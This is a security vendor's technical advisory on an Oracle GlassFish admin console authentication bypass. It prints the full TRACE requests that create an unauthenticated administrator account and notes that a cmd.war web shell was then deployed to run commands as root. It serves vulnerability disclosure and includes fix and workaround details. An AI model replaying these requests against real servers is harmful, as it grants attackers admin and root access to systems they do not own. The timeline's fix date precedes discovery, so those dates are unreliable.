Back
NCC Group Publication Archive
Cyber Security
Technical advisories

August 5, 2015

2 mins read

Increased exploitation of Oracle GlassFish Server Administration Console Remote Authentication Bypass

Summary

Name: Increased exploitation of Oracle GlassFish Server Administration Console Remote Authentication Bypass Vulnerability
Release Date:  5 January 2012
Reference: NGS00106
Discoverer: David Spencer 
Vendor: Oracle
Vendor Reference:
Systems Affected: Oracle GlassFish Server 2.1 and 3
Risk: High
Status: Published

TimeLine

Discovered: 26 August 2011
Released: 26 August 2011
Approved: 26 August 2011
Reported: 26 August 2011
Fixed: July 2011
Published:  5 January 2012

Description

Core security released a bug in Oracle GlassFish Server Administration Console on 5th May 2011 which can be found here:
http://www.securityfocus.com/archive/1/517965/30/0/threaded
and here
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1511

The rating of this issue is classified as medium due to it only returning sensitive information. A full fix has been released by Oracle.

NGS found that it is possible to use this issue to create a GlassFish administrator account as an unauthenticated user.

Technical Details

There is a known authentication bypass in Glassfish, by using a TRACE method rather than a GET method it is possible to access data meant only for Glassfish administrators.
The following requests were used to create a new Glassfish administrator:

TRACE /common/security/realms/manageUserNew.jsf?name=admin-realm configName=server-config bare=true HTTP/1.1
Host: 10.65.78.211:4848
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101Firefox/6.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://10.65.78.211:4848/common/security/realms/manageUsers.jsf?name=admin-realm configName=server-config bare=true
Cookie: JSESSIONID=ada23501f36f1ec9148589e9a574

This then gave access to the create user page, however it is important that when the submit button is pressed the resultant POST request be converted to a TRACE request.

TRACE /common/security/realms/manageUserNew.jsf?propertyForm%3ApropertySheet%3ApropertSectionTextField%3AuserIdProp%3AUserId=NGSSecure propertyForm%3ApropertySheet%3ApropertSectionTextField%3AnewPasswordProp%3ANewPassword=Password!! propertyForm%3ApropertySheet%3ApropertSectionTextField%3AconfirmPasswordProp%3AConfirmPassword=Password!! propertyForm%3AhelpKey=ref-filerealmusernew.html propertyForm_hidden=propertyForm_hidden javax.faces.ViewState=-2309913764624097582%3A- 2546877703812727807 com_sun_webui_util_FocusManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton javax.faces.source=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton javax.faces.partial.execute=%40all javax.faces.partial.render=%40all bare=true propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton javax.faces.partial.ajax=true HTTP/1.1
Host: 10.65.78.211:4848User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101Firefox/6.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-gb,en;q=0.5Accept-Encoding: gzip, deflateAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Proxy-Connection: keep-aliveFaces-Request: partial/ajaxContent-Type: application/x-www-form-urlencoded; charset=UTF-8

Referer: http://10.65.78.211:4848/common/security/realms/manageUserNew.jsf?name=admin-realm configName=server-config
Content-Length: 0
Cookie: JSESSIONID=ada23501f36f1ec9148589e9a574
Pragma: no-cache
Cache-Control: no-cache

This created a user called NGSSecure with a password of Password!!

NGS then logged on to the Glassfish administration console using this newly created user. Once logged on as this user it was possible to upload and deploy a website, NGS deployed cmd.war which allowed the user to run commands under the context of the GlassFish server which is root by default.

Fix Information

This issue has been fixed in GlassFish 3.1, a workaround also exists which is to disable the TRACE method on the administrator consoles web port

 

Published by NCC Group Publication Archive

Here are some related articles you may find interesting

Ghidra nanoMIPS ISA module

Introduction In late 2023 and early 2024, the NCC Group Hardware and Embedded Systems practice undertook an engagement to reverse engineer baseband firmware on several smartphones. This included MediaTek 5G baseband firmware based on the nanoMIPS architecture. While we were aware of some nanoMIPS modules for Ghidra having been developed…

Hardware & Embedded Systems
Reverse Engineering
Tool Release

May 7, 2024

6 mins read

Sifting through the spines: identifying (potential) Cactus ransomware victims

Authored by Willem Zeeman and Yun Zheng Hu This blog is part of a series written by various Dutch cyber security firms that have collaborated on the Cactus ransomware group, which exploits Qlik Sense servers for initial access. To view all of them please check the central blog by Dutch…

Digital Forensics and Incident Response (DFIR)
Fox-IT and European Research
Vulnerability Research

April 25, 2024

7 mins read

Public Report – Confidential Mode for Hyperdisk – DEK Protection Analysis

During the spring of 2024, Google engaged NCC Group to conduct a design review of Confidential Mode for Hyperdisk (CHD) architecture in order to analyze how the Data Encryption Key (DEK) that encrypts data-at-rest is protected. The project was 10 person days and the goal is to validate that the…

Public Reports

April 12, 2024

1 min read

Previous post Next post

View articles by category

Most popular posts

Most recent posts

Call us before you need us.

Our experts will help you.

Get in touch